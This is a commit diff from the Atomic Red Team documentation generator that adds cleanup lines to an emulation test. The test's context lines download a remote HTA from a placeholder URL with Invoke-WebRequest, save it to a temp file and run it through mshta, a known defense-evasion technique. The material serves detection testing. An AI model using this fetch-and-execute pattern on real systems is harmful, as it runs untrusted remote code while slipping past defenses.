Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2022-10-12 19:10:02 +00:00
parent 051753b04f
commit cc0f4485ca
2 changed files with 4 additions and 0 deletions
+2
View File
@@ -14998,6 +14998,8 @@ defense-evasion:
$var =Invoke-WebRequest "#{hta_url}"
$var.content|out-file "#{temp_file}"
mshta "#{temp_file}"
start-sleep -s 15
stop-process -name "calculator" -Force
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
'
+2
View File
@@ -124,6 +124,8 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
$var =Invoke-WebRequest "#{hta_url}"
$var.content|out-file "#{temp_file}"
mshta "#{temp_file}"
start-sleep -s 15
stop-process -name "calculator" -Force
```
#### Cleanup Commands: